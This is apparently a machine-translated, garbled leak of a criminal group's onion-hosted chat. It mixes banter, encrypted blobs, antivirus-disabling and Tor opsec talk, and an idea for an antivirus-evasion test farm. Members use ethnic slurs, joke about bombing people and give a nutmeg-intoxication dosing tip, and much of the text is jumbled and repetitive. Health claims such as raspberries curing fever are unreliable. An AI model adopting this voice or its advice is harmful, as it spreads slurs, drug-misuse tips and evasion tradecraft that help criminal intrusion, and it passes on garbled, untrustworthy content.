2) Log in with a new password.
3) Re-enter the settings and select Reset E2E Key
4) Logout from all places again
5) Log in and new E2E Key will be shown, write it down
6) logout again
7) Log in and enter the new key that you wrote in step 5.
``I have with some on e2e, with others on otrNow, by the way, it happens ... Turn off e2e or on and off another scenario - want to install otr, but can not ... and "Hello" no at allThen you know exactly what it did not come)You write "hello" and wait for a reply. There is no point in setting an apr if you have not responded.
It turns out, set silent apr, threw the message, on the other side of the chat hung, people reloaded it, the message no.)In general, it's even good, that there is no "auto-agreement" on отрeyJhbGciOiJBfi5V5Jmjnivz8XK8sdXfpkQ3uz47m6AcajiNgwP/dlWX1WgNIc69CoyABruZAw/T+NVSue4TfDmmqxfmAd1NboOIonngUpSt8enivYnLOiQcQeu7brFk7owadBILwZB+RR/EddKWLUzDrCs+GWG9T/O8CvWhlZcCdz9k+F2fHvtsWlNLZhvxZjf4UxrlB5XWeyJhbGciOiJBL/al5tPa8rU6xywgLLxgPzlXW7EjbZBd4sJMI80CAVNF9IsksfbHpACE0TR0F6ONXiGkekmwmuANxud1p60KePjI6ppZOyavrDtoaCEcBvgLFymUmMMFDZIIykA6uEgC0Z/bA3s9IyhF4cBdmr8kq5TPjOPdqKFzUqn16rDGxA5vl43J+fGq6q+2Zp4wT5tn0qyjlJxqc9B1AEH9iTWJocP9NWzr+HBLPVidmC/1LMx0XKGfoNLcwX2c3yKxKnIQjCak87Nhd4W4Jxyr0qfTwU0czNd9B3tbg5zDPojSMqOsfylN+oySKoS+ZVcbS8Y7xGF91HApblLfrj0Od87zRoDS8ToTbRKbTVBhENkyrn2Ztt+QzbazzAjRnv6A8kCXHBV1ko7xoF+HZqyc5SQngDehVWn3cIMO5VO992Ow/ocs+meDSOIiqL/c7CCyPqacf+BCSrPR0veMckGbvCHWLJh+qZ/ihUzpFj2JfMdLTo0gkojZ1vrfVxtqyJdMGGVVDTBxddTn8H82AePywU9j8mJktIv5LcmSbIKzqApziDbsL5uDwv27Fa0v9XllcEbD8sUs3OhPayV/lKMrZm2c/7TRLK9UqT4Z62JAKipsAN0bGNvgbDLHPiyv1az1eIN9QhbHQXAO/kjCHZZjzJM6ShrMYicbCxZR9iZIMKnQAFg5DTo3ktrSxNkfIFOcQBOuuJPT6o0mDCH4OwtzANYKWg==eyJhbGciOiJBUicaS82glz3k+UXssu/3fgx2zpipf7gglpYUnZYEoBw+rDI4GcofNMzFdgvGUE Yeah, It's cool there, young people come back. You think they don't have enough work? I do not know, I do not know ... and in general, no time to rest, and do not need, as they say in the next world to rest 😄:laughing: not yet tomorrow, by the euphoria in the chat, you would know immediately-guys, no zap ran? @ganesh check your toad, plz! I pray for you every day with evening prayer too. not forgetting about the day @hammer your lyrics delight for my eyes! Thank you my flock, I love you! I'll be praying to the bot in the morning for your wallets! @angelo, I dedicate these lines, not stolen anywhere at all, to you
Advance, advance, where are you going?
Advance, advance, where are you going?
I missed you somewhere,
Advance, advance, where are you going?
I don't want, I don't want again
I don't want to chase pigeons on the rooftops,
"I don't want to chase pigeons down the rooftops.
I'll save a few of them.

The old ladies look at us sideways,
They don't recognize the promising young men of yesterday, What life has brought us to,
And (insert name) and I walk through the yard,
We'll look at the heating mains, maybe we'll find someone40000:D)))))))ahahasecta witnesses Angel's "listeners" reclassify us as a sect aha)) Pelevin "Our ears are on top of the head! A discount on garage shells!" ))))))))))))collectivelycould be put in the status in the toadstoolsNo need to remember the slogan))) we are pussies and we have a bot! From krebsai a whole article about angel how he cooks pigeons) and catches bums)[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=oZb7XPmcPszg2hDKm) I laughed at it today too, they say what the Russians are doing there, they're crazy)))) or did Trump start a tweeter analog? it's time to defrost Trump))) the vanga predictions) Ah, you mean it) how it will be April2022`` it says April2022`
https://www.coindesk.com/markets/2022/02/01/hackers-move-383m-worth-of-bitcoin-from-2016-bitfinex-hack/
``2021 probably``) since the latest of the year? And I think these lists are used by amlbot or something``.
As noted in April last year, most of the bitcoin associated with the Bitfinex hack is widely tracked and blacklisted.
```
What kind of cryptic blacklists and then my wife will kick out our correspondence and write that the team changed directions and activities) Angelo, you have not sold your dick yet? I wonder if you can sell organs on avito, like donoridi at avitoThere are only competitors) who will you sell here?
``On Tuesday, Feb. 1, the coins stolen in 2016 from the Bitfinex exchange came into motion.
``When I look at my thighs, I stop trusting my left hand trying to grab a knife.))Angels eat pigeons? Oh, this gossip / intrigue in my yard all the pigeons disappeared@angelo you there alive? Today is the record delay for 2 years, as I see. Well, that's not going to pay today? Or will they give it to me? Hey, who's in charge of cryptopanel?
it's better to come out of your coffin once a month
and see white light that makes your eyes pop out of your head. You're confused with the movers.eyJhbGciOiJBo+O4/H58sghnYCMy0GcWnN1K9URq8MDWlIc8+ZFha22zDI9EkiBR5HrIkN+lNDMh/hKan21x68HObiaudMvplL+G27jzD5Qz7oJCMNYqzrF7I3czfIu4/wmypErJM1tlmeq3ffdaN4sSG/wc2p4n/wwrcixgIY33CpESYMSDpkJcmblURv32F6vJ13mckXuceyJhbGciOiJBLp7X+eG5kgEDkcEGOt1JNKQ4S0FIqULFceE5BLYEO2+YWcRvTH4dZM8Q3i+9zlRC8FnYmYnZNYoBQC0psmrDuTuIGBML+MruAiCgVLpTuKTrlwQQfXrmFSdt16v37DLhxadeUbKLSxWWJpYeZPvF+qhFhilmDq6ZxHcwObPCG3U+TTGfCh1uN9w1V7hK+aQ+YMB4XAuzoeYbTSyod3hk0VOUqbUTJj2RruZGKEDpcugRyADOnKgyqYdMJf9HzZGkmE4vuqRjwNLMCFQPzq2RkQbvmhjmMN6+zV7CnxX7D7raE1XCkOZjzNK50ABJHZWIR08Q3/qmgeoWP1h69ANQryXAZkZrMTytFB5nr3YbgzxdkobqwORoWiiFa+5LLgw5moZCMHdElM03EaeGmXrb7XW31nuUGgLDHJi6appQKlFqiUHgI0N9YPWV+WChcYeI6wQOz0ZFXTmKUIMbe39FXeweYaq/7uIh3PfIQaxAQGJFemzVVRElaBhYGbislrZXvfrOXk0eJJpbC1z1xfAJmRm0bOQwMbkhecI7J/ui18HVdhpTwCGUwVI78ot6gqM07Q0z792EQl1lX/R+4wz0JFXtcF0ewVYmJ+JmqEELT7yKJkUmwgINqorrrpHdVVNqyAB9JEN3dqPKH8j04PdbAZGxfJgCNLkJWi4IOgLjnVdxC6iHaYTeSyv8+MsoiGnSoMIfIT8ETiVQ+aRYZDmTl1F1JRfqUeJXeK0X8Qjyx3XTbtuEc3QxIqOs0cfxfae4H/ULD8TcuPix1RG7dWC6+g==eyJhbGciOiJBIu/m 11 dunno, i don't want to install this shit on vin 10 yet and every time you reboot this thing turns on by itself without asking through settingsknock it down i have et32 while it works, vin def off (in most of its power, yeah funny)disable it through policy and all i have on 10 did not turn on after node this hypothesis homeravore actually def turned on itself long ago if another av is off or the faceplate expiredone will strangle anothera what's the big deal?install another AV does not work? @all how to disable def in vin11? very patheticgood dude dananado jam for zadornov or is it already extremist jokes? who put 2 in english? it's a question for the admins) listen I have a question, and why weldon and not welldone? ``https://www.youtube.com/watch?v=G3NuBzsG6AU```░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░"░░░░░░░░░░░░░░░░░░▀▀▄
░░░░"░░░░░░░░░░░░░░░░░░░░░░
░░░"░░░░░░▄""▀▄▄░░░░░▄▄▄░░░░
░▄▀░▄▄▄░░"▀▀▀▀▄▄"░░░""▄▄"░░░░
"░░"░▄░▀▄▄▄▀░░░░░░░░"░░░░░░░░░
"░░"░"▀▄▄░░░░░"▀░░░░▀▄░░▄▀▀▀▄░
░"░▀▄░"▄░"▀▄▄░▀░▀▀░▄▄▀░░░░"░░


░░░░"░░░░▀▀▄░"░░░"░"▀"▀"▀""░
░░░░░▀▄░░░░░▀▀▄▄▄"▄"▄"▄"▄▀░░
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░
░░▐▌░"░░░░▀▀▄▄░░░░░░░░░░░░░░░
░░░"▐▌░░░░░░"░▀▄▄▄▄▄░░░░░░░░
░░"""░░░░░▄▄"░▄▄░""▄▄▄▄▄▄▄▄▀
░▐""""░░▄▀"▀"▄▄▄▄▄"▀▄▀▄
░░"░░▌░"░░░▀▄░"▀"░▄▀░░░
░░"░░▌░"░░"░░"░░░"░░"░░
░░"░░▀▀░░""░░"░░░"░░"░░
░░░▀▀▄▄▀▀░"░░░▀▄▀▀▀▀"░░
░░░░░░░░░░"░░░░▄░░▄""▄▄▀
░░░░░░░░░░"░░░░▄░░"""
░░░░░░░░░░"▄░░▄▄▄░░▄
░░░░░░░░░░░"▀▀░▄░▀▀
░░░░░░░░░░░"░░░"░░░
░░░░░░░░░░░"░░░▐░░░
░░░░░░░░░░░"░░░▐░░░
░░░░░░░░░░░"░░░▐░░░
░░░░░░░░░░░"░░░▐░░░
░░░░░░░░░░░"░░░▐░░░
░░░░░░░░░░░"▄▄▄▐▄▄▄
░░░░░░░▄▄▄▄▀▄▄▀"▀▄▄▀▄▄▄▄
░░░░░▄▀▄░▄░▄░░░"░░░▄░▄░▄▀▄
░░░░░▀▄▄▄▄▄▄▄▄▄" Hey come back, I'll forgive you everything:rofl:deanon Veldon on greaseball has fallen asleep too Veldon is an old manSorry no, he trolled them heartily)greaseball from Baghdad yelled, about the black-male B-:joy:as greaseball once yelledbombing Baghdatka as Lavrov said - D'B :grin:[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=D6SprMeQehLFFt7d8) aha, the bombs will expire :D can we do it again? Fashington?)))send it to the Sun, warm it up, it's getting cold. And live in peace and harmony)))) then don't take off if only baptized !hulebombs chillnadon need to bomb anyone or in the elevator did obama piss in the parik? loltaktoe the feeding hand...([ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=tkEEELGm4KSw8jMRW) the pindos should be bombed right away, they're fucking around in circles, they can't get off. no, there are sick people at work here, acquaintances are bombed by the fucking khokhly people are tense, it's all because of the escalation in ukraine, Tea with raspberries, under a blanket - always helpsHot tea on dried raspberries (that is concentrated) dilates blood vessels and body heat is distributed to the extremities, vessels which are spasmodic and due to the expansion of blood vessels the temperature is reducedaspirin is something about spirulina and anti-inflammatory....well salicylic acid, that's aspirin, I think... hence the thrombolytic effectIt seems that we were lied to since childhood `The antipyretic effect of eating raw raspberry fruits is expressed relatively weak, but thanks to salicylic acid, it may also be present ``in a canned raspberry indicators of "usefulness" falls sharply, So there is no need to talk about the health role of raspberry jam` raspberries bring down the temperature and everything` then the sugar spikes and cunt`s another thing for sure, that when you feel like shit you better eat jam than read scientific articles..)I remember from my childhood about it )No, raspberries are great for taking the feverAha )I know for sure that with jam better than without jam))Not raspberries thin the blood so there are no blood clots like in fancy diseaseDa and I know it from my own experience. I know myself. When I get sick, I drink a large dose of it in oranges and tangerines ascorbinkaAll this takes immunity in vain you eat raspberries, and laugh it all is a delusionNe I once said a doctor I know, when I told him the computer repaired)) I was told this once by a doctor I know when I was fixing my computer). About 10 years ago. There are links to scientific articles. C in good quantities everyone knows that it helpsI protso also runny nose and headache) guys, and who came up with the story about raspberries? Men, so if your head hurts, the crown or what?[ ] (https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=iayysaN7LZDLfCSft) you seem to have waited and) M.b. K19? Mankind has been living with caronoviruses for a long time now, and it doesn't give a damn either)so carona has distinguished itself by the temperature of 42 it doesn't care about these eblans, with eblinkin, Khokhland will soon destroy it...By the way, in América, when you take a temperature with aspirin they somehow killed a lot of people in 1918-1920, and they called it Spanish so that no one would guess) and after 42 degrees it's free DMT in your brain, so you can get high too! Citizen, why are you freaking out? ))))))42 - this is denaturation of protein A temperature increase is a natural protection of the immune system. There is no need to bring it down. At ~42 pathogen dissolves.Ya remember two calls that year, Arbidol suyut and the temperature is knocked down... On the third call already took the whole family to the hospital for droppings, sookie thought maybe not eaten normally with hunger) at me recently also was 38 but the temperature did not feel stupid dizziness lived quietly he looked at me, said you have not kovidya called a doctor. Why not necessary people feed) less money pensions today I called a doctor.  It's all coming).  Apparently they work on the principle of who will die first: "The donkey or the Padishah") not to be confused with a full house) if only there were doctors, all our hospitals are full :smile: I see) I was sure I would give birth and they would give me a penny but it was a disaster. I had stomach pains for two days and I survived till the visit. You have all the indications for medical help anxiety, panic, pressure is difficult and you lie like an asshole 3 nights did not sleep at night by the way you sleep at night? or you do not sleep at all? there is such a h-??)) do not take6Hold on. ODS with an upgrade us 555A today my wife says the light in the car is on)).  Went to put it out).  Yeah. All sorts of thoughts pop into my head... On the other hand, you never know.... And you never know.... well yes, it's so stupid to move the horses even crapEvening when it went over 40I was thinking the same thing yesterday)@manuel makes a good point.  I got sick the first time back in the first wave.  Saved by gargling the mucous membranes of the throat and nose + raspberries.  I got 4 people, all more or less okay, I got the fuckin' disease. Yesterday I was 40.  Muscle aches and headaches.  Today it's 37. I was overheated for a day. But it ain't pleasant. I agree300 guys, what's the doller these days? They're usually small, and to pick raspberries - well, that's what I give a shit about spiders) but bones who have teeth bolmt - it's a trendetz... so it's a protein... You can also not eat them... CaterpillarsDapauki?They don't taste so good... spiders, caterpillars and other critters... Raspberries have two disadvantages: the bones are small and you can eat bugs with them......(s)raspberries are very cool berries, but they've become a delicacy in price...no raspberries !!!! ska all ate me up@kermit everyone who is chipped must have a scar on his left hand, on the phalanx of his finger and vodka and beer) @angelo bro, tea with raspberries is very good for thinning blood) Angelo ignored me, not a decent person@angelo are you chipped?i was prescribed eliquiz during covid, they said i had to take it @biggie no, should i have? i don't really like pills@angelo do you take blood thinners? @angelo i had nospa and nias - it didn't help, then the old citromone, it seemed ok, but what i had - dunno for 3-4 days39-40 and a high temperature?I don't know if it's good for me, I've been taking this Omicron like a knife scratching my skull from the inside and the pills don't help, it hurts like hell for 24 hours.the other day they said that even more fucking shit found with absolute certainty - OMICRON is a fucking shit, it's for the prevention of "time attack" if you connect bridges, it does not matter, for certain types of connections tor must be synchronized "time" on the pc and in torpz how tor is sensitive to the time zone and the time of a couple of hours:vulcan:kuvsem hiida sorrhet europe H2S) everyone приветeyJhbGciOiJBwt/p2YJwh89yKwSaozxBuLQBgFrrT0PJXLXhpI81WzbYzzqv1MefRyQcrlQR9uZCG8O+cR9AituGkjlafMSBA/7r7ObFRRSarBJZvLl4Xi3zsvyUyvk7oNQW2H5S4iVhOSxwO6m7NaiFv2KqWA7jMIJFVvZvNwGIotXnp7om9qE=eyJhbGciOiJBHPeDVd7pVoKKu5NHRW79Mxo+q2CRFmNOWpq1vRYikduyyJwB8FtiDFgio+MyREwii86eQmGU2jAP5WsizpLsMXuYbej6hEn88QNpvTV08a64CPVn+0XPy3v2v36CtRLiZeEuW7Op42/Lt4NOyen/52PEKBKdQVYL6TOOOsVWSps=eyJhbGciOiJBvSmRFFqCWIUnnmvL/HR/J3s0qaDeANus+kha5ygmWO+GgwZQ+S2vSJgSGTwrXCFIFUZ7sc9JXhLfC7eF/Qxsg6aWDaqBYOGGrgPp3H90/Rs26owB+5+oqFZcqq0p4cPPZfUm5wIFfprrJxb75d17uf/q4JfA6Tm75Dhzbac3bG1/tirRt16LLCEK/C1zHAhxJYCIdrpa5Aof/CiYBnHAHQ==eyJhbGciOiJBL4wnlepQYYMFjgI491YwnzuXFCCgPLECTvROKWfjFT6HT/Y4Si5HP8i/7MbHFfLTZRlaA5kLbnucGYWdV3bpCDz9ndQQFBwN7dStUd7ML5JlC3veYWQEpw8JJooioErjEkEXQi/Y+zXNN1ln2//My+mRD7ltCLuPWnXQymzgry0=eyJhbGciOiJBkuQJTFWfgKq+7yNb2ThA3gyGGI8vzSTt4kOnTaM//p+qD/Z71Gjf9rMptQNn9PQszsBasE4cMOuQxlrL+M7yWkBUwJU+yks5woWc6cyZf6PMfWpBZFrVIhXPh+IYChiQ2Pq2zbp84iPM7h5SgsIn8c/jk+AVSh0ui/VFgSbb1Y0=eyJhbGciOiJBNHWLvASAYh7ltE2Fi/ztmxKoEGOTbXqcS3mG We have solutions for loggingBut technology is not standing still)I once wanted to write my analogue of this. Even managed to do the basis, but the whole problem was precisely the antivirals and their logs.  But it is quite an easy project. KVM is very well controlled remotely via special tools, even in PHP you can implement it (load a snapshot, make a script, wiggle the mouse, turn the network on and off) Team AV farm, this is your finest hour)) +dinchek at all Whoops ?Let the fat man eat, he is a JYRIC, and I am a skeleton)[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=BTFfeCJ6ZXBWYQjyg) you will get eaten by angel, for such statements, cook and eaten) no, he there by watsapu and something else there keeps in touch with everyone.
He is the "poorest deputy," and we are not shy, we will take what is ours and share it :rolling_eyes:I will take it into account. *Restore the national anthem, and the country will say, "No wages," for sure :zany_face:[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=H5RD3kabtNbr7ikdg) ta no, he's there on Watsapu and something else keeps in touch with everyone.he's there, he's on watspate and something else. he keeps in touch with everybody. zzz our everything. i wanted to go straight to the mintolovoy recalled nashi miga in giagenagen we will settle in rome or in ukraine everybody panics, they are already packing to fly away. he will tell you that Wolfich is dying there, and people do not know what to do. Their party guy said that there was nothing wrong with him, just a hype and faggoty journos. He is really just lying in a hospital just in case and working there, feeling fine. They bring him the documents to sign right there. ``https://www.yapfiles.ru/files/2680264/c6deb3f0c7913657ba89ec42faa5160e.mp4?token=MDI2ODAyNjQtMTY0NTAyMDE1Nw``````
https://www.youtube.com/watch?v=8aDxfJ-eCxw
The Petrosyans with the Stepanenkas :rofl:yes, it's a well-known fact:joy:not lovers but lovers.lol I saw a video on the news, where they said he was not cured by Covid, but his lovers poisoned him.He is not in the Kremlin, he will be sad without him.Is he alive?how's taiy jirik? in the kremlin everything is ok through vkk through vpn gohdihz, we're ok, update the chainsConnecting with rocket is always going crazy.i don't usually hightail it before work i decided that why is that? steam locomotive hightail it not just a steam locomotivebut i don't take it from the hill i already take it to the cab driver who takes it to kiev we have a view right from the kremlin do you rent a house there with angelo? with a view of the kremlin how do you say in russian?adama to the Kremlin, there will be rumors to move the bosses) i'm not an extremist, i think it's quicker to move it, what's he saying? i thought xmr would reach their heights of 300 plus fuck and what to do[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=PhFj9nurqu6gDBbGQ) like if there is no trust in the network, why should it cost money? All of the aforementioned will be reflected in the monero rate? Now those who have capacities 51% will lose all of their investment. But again, it would have quickly surfaced (because of errors in 49%), and again, the rate would fly away.yes, if it was 51%, it would be useless. but would have pledged someone else's money, and then what? on such news rate would have crashed and they remained at the broken trough is in short the blocks can be faked Centralization will fly to hell51% - bitcoin and what does it say? so `www.moneroobserver/minexmr-top-monero-pool-hashrate-drops-from-50-to-38-percent/`just a little bit more and monero could come 51% attack[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=9QNkFMHAzeXxvfmCr) ahaha, I remember, disks even sold inet) essentially the same poker, dopamine-dependent investinghe man is forever seeking kayf so I suggest you do nft push and we will be rich)My favorite posts  - I do not believe in NFT, I have earned two million dollars in one month. I remember something about the old topic - selling music that evokes the effect of drugs and adrenaline Only green tea If you're not a Old Believer, then what - digital drugs?
It was easier to buy them, although children with bags under their jackets were also eloquent for their kayfushek, yep moreover for the nuts, there would be no claims, unlike grass.He is still remembered[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=Xi6F2hYsHB5Cna98j) so what successes he had) where did the poor students money for grass, when nuts were kopecks.@gelmut but it was not easier to buy grass do not?[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=AraPMsHsimq6tkXzu) so not those eaten. There are two kinds, one ordinary (dope), and the other culinary (not dope). But it was not particularly control where there is what. For this reason, were guided by price - had to take the cheapest and most questionable packaging (or even on weight) - that's where most often it was what you need. Again we need the most common whole nuts. And it is necessary to chew them well (ideally with kefir).  I had enough of 3 nuts.Hitler, according to memories of his personal doctor, from 1940 every day took methamphetamine, so, brothers, be careful with it)) that is his and danger) let's better sing our song tried to achieve the effectbut we noticed the effect zero moreover they affect the brain very strongly and there really can be non reversible consequences of constant use.I've eaten them, it's very easy to get poisoned[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=ZhzdQs7CiNxAmjPaY) What's wrong with them? I read about residuals after consumption, and they stay after a month and years[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=PCyd3vKpcypfCjowp) but it was a cool thing. Can you imagine that effect? I still remember how I had insomnia for about an hour after eating nuts, but it only took two minutes.  I also played Heroes 2, and it seemed to me that I spent all night at the computer, but actually played about 20-30 minutes.  An acquaintance also decided to try it, then started hating cutting vegetables for a salad. According to her feelings she was cutting a tomato for about 30 minutes, although in fact the minute did not pass. Told me that she cursed all nasvete while she made a salad.v drug the most fucked up one - the consequences are very individual, I even YouTube reviewed on this topic, collected the date in his head for some reason, but then the internet especially was not, all in the words tried dangerous thing, muscatvse remember :Dorkehi, muscat ?Who remembers toy *KND2 *?? `https://youtu.be/clA3uvSY8S0`
after 30 hours at the PC (and the monitors back then were CRT 50 Hz))) - Such frantic glitches:zany_face:Just from nuts not so much glitches as time perception bugs. At first it's funny, and then unbearable even Ru group in the carts, people there is poor when the parish stays forever.... not recognized as a separate type of disease is the same syndrome it is quite possible thought the roof will not return in placegalucinations thing funny, as long as they are not long. As for me, hallucinations are a very unpleasant thing, if they are not unicorns and butterflies@gelmut so yes, but the end result is the same, terrible overexertion:vulcan:Well one thing is insomnia - you want to sleep, but can not. And when you're partying you don't want to sleep, because you're always doing something.No guys, I had a couple of times insomnia.... terrible thing - not sleeping for a long time, the mind after the joke is very unpleasantIn my student days I just two days without sleep... fucked like :rabbit: )and sometimes even to the point of hallucinations, when "when I was young I didn't sleep for 3 days"[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=fe9kTY7YhHXvrfxM5) I once when I was young didn't sleep for 3 days - partying, beer and everything else. And then I sat down on the couch, blinked and only got up in 14 hours.[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=KRcLk2YEvF4CFRtRC) Gansa's experiments on speeding up participated of course, not knowing what kind of withdrawals await them[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=kHtGfkZ62A4xcerL4) you can not sleep with alkashka:laughing:pervintin more>soldiers on amphetamines
panzer Schocolat you can't mix it with booze it worked like a short circuit and broke down, I slept for 14 hours I remember on New Year's Eve my friends mother put them in beer> and turned them on by hand
and the internet provider is the same and the power grid is the same. that's how they got the hacker in yusa. garlic is the important part, right? The most famous are eleuterococcus, rhodiola rosea, astragalus, ginseng and many other herbs. (https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=NejBiHnS3eWGDhEmf) Adaptogens are good for you. Who are we to judge them?
Jamshut and Ravshan do not want to work!
Who has cleaner blood? My favorite skinhead topic is Aryans or Slavs? We are all brothers! I know you're joking! I'm kidding, I even knocked on wood.from 15 to what 16 from 14????? from 14 to 16???? Passport from how come from 14??? how come you can get a passport from 14??? let them walk with walkie-talkieshow do you know how with children per person if you have 6 small children, then what??? you only buy them SIM cards, and yourself Kukish???if you have six small children, you'll only buy sim cards for them and not for yourself? how can i tell you, they actively oppose the population, it's not a big deal to change a VIN. in Ru, laws are bullshit. all operators will have to pass a law that allows them to have only three sim cards. everything must be through public services. I will make a fake, god forbid, you cannot do as you want, i will send myself smileys and be happy because i do not have friends:D how to become elusive joza sticker in facebook give manualvot then straight zaebtsa will not, nihera, need more thick candle such for 200 p put korochee safety, the level of crebs or autostarts so there is no timing attack including them manually i have every toad on different clients or in different sandboxes you turn on one account or go online when you turn on your computer so at least one by one different clients blink so you need to connect them on different torus chains for example all accounts will drop out and connect simultaneously any disconnect, the only thing you need to do is to switch between windows and icons, so you'll have to switch between them all at once and disconnect, when you switch between windows, you have to use ssreenPsi, it goes without saying i don't have one jabberbud like a real hacker the second one or psi+ or mcabber is 4 years old, so you shouldn't touch it at all ?because they can't even fix the icon to hang in the traywhy? it's been dead for 10 yearswho uses pidgin? while you're talking a national fairy tale snake green elephant?at least he didn't remember ours, it's like Ru is a movie, like in Schwarzniger) who didn't give birth is a father and there are many more advantages, no one will give a fuck - yes i did it - it's the best kept secret of any man - to get pregnant for a thousand dollars i want a thousand dollars you can't even try to stand upside down maybe i can do it too what do you mean birch tree? ``Does birch, gives bream at once``I had one woman, I did it without rubber, but I didn't inject it... but she was doing "birch" and I don't know what else... she got knocked up... it's an old story) and you were like: stupid, I need more up the ass, let me show you :D at that moment it's a good idea to get a dope so guys, you should take your dicks with you, now I'm hunting for IT guys and my fingers remembered) I slept with a girl, went to the shower, came home, watched her stick her fingers in her vagina with a condom. Said, why, you're a good-looking guy, with dough, and I want a family :D All hail, caffeine drinkers / klofilinski) for sacral knowledge for us fly out without negativity, well, you and schiziki apache already at the gas station fingered us !you guys are full of shit, respect the blue tractor, remember the fuck you've seen too much )so there's no doubt where i sing from youtube and show her the video clip i'll tell mine, i'll tell my cowgirl not to fuck around ![ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=j2bwGSg79tTk89qtr) you just need a divorce) otherwise you could catch a bad trip, and then where the buddha himself leads.now i do not sleep much, and i think a lot. i need to be completely free, relaxed from everyday problems, like some fairs, right? by the way, i heard in the ukr, they allowed light drugs. are you inadequate now?) when will you become adekatic? when will you go mad? later, i think so) are you in business? i should check the brain, it's all theory, speculation, what do we know.and doctors say that stupid confusion of images from the subconscious - i do not believe who if anything can fuck up and calm down but you need some trusted person for an hour coming in person saw unimaginable would not want to try lsd people have lived in different worlds under the same lsd by the way for example a good movie circle fuck up is the mandela effect and why wonder, up to likely there may be waves that can read the brain. Let's say it's not uncommon for some people to come up with similar dreams at the same moment, I once went to a high school to write an exam. I was not prepared, I understand that my head is empty. Believe it or not. i got stoned and passed, and i wrote it myself but not everyone has access there's a rumor that in a dream there's some kind of information exchange base and in life there's a fog i try to remember the dream and then i wake up and i'm so cheerful i solve it in my dream i dreamt i fucked over a very hard problem i wonder if i had a vision i was riding on tanks today by the way i found something to read[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=qMpGZSGisdCgF9GE2) and i trusted you so "krebs news" russians are totally fucked up, they are looking for a new functionality in vangine, while i have a coffee, it's for good, not for nothing who will go?and find out the truth of being in a cell with them, then you should also sestibo know that they were in charge of the secrets of the universe, which is not allowed for the wretched, while they went to moscowputin put them in jail you urgently need Mayan shamans ) they will help the church it is worth candles in a church that no one knows but we can learn the truth as for me it is not worth it. Because there are too many unknown variables, which in turn can lead to unhappy consequences. The same predisposition to schizophrenia, 4 days without sleep will be the starter of its activity and pussy.in unconsciousnesspopoetically passed out, I do not remember how I no longer slept for 4 daysnu hallucination begins after 3 days already, at least for me so ) 72 hours, and your brain starts to go haywire! It is better not to joke with the head. Here you see the trick, everything is indivisible. I think I will not become a super soldier. Nobody can take it out. Even scientists have proved it. You make great discoveries and it starts to creep when you sleep in that regime. It's a shame to waste time on sleep myself. There is a great scheme, sleep for 4 hours at nightGood morning, everybody!
You can't sleep at all, no normal way to restart brain activity has not been found yet, it just happens during sleep. Your problem is solved by sleeping, but before that you need to give up coffee-juice drinks/foods. And sleep.lying on the couch, weakness tin, just heart pounding, you can not get up, but do not want to sleep) thought cheer up I once ate a tablet of caffeine, and energy in the eyes can see the milky way to the morning in obed and evening and not to be addicted to it, I am familiar with it on the cheap something like coke and coffee from it splyumozh redbulb?i'm trying to make something with caffeine i'm trying to make something with caffeine i'm trying to make something with caffeine how's life, not easy?Good morning to all hellojefferson+need to be more peaceful)but it's a desperate phase, when you want to punch a monitor...lagodrom) in addition the engine may be giddy or tinny)) yeah) i call it a state of software when it seems to work (not frozen), but does not work :)))) chewed?)yes, I have a torus jammed, now all is fine, I'll figure it out, thanks) maybe on my side of the problem (return it tomorrow), I will then tomorrow and pour) git lie down that?) thanks for the feedback, all foundSomeone here have worked with RabbitMQ? There are a couple of basic questions.Is g5 g15 needed too? g5 g15 left apparentlyBQ yes? @all guys hi all, who works with g12 g10 and g5 groups please call me backThanks for the tip without specifying the protocol it is impossible to tell what's in tcp.payload is a layer 4 protocol according to OSI modelhas anyone tried decoding tcp.payload, there is a normal 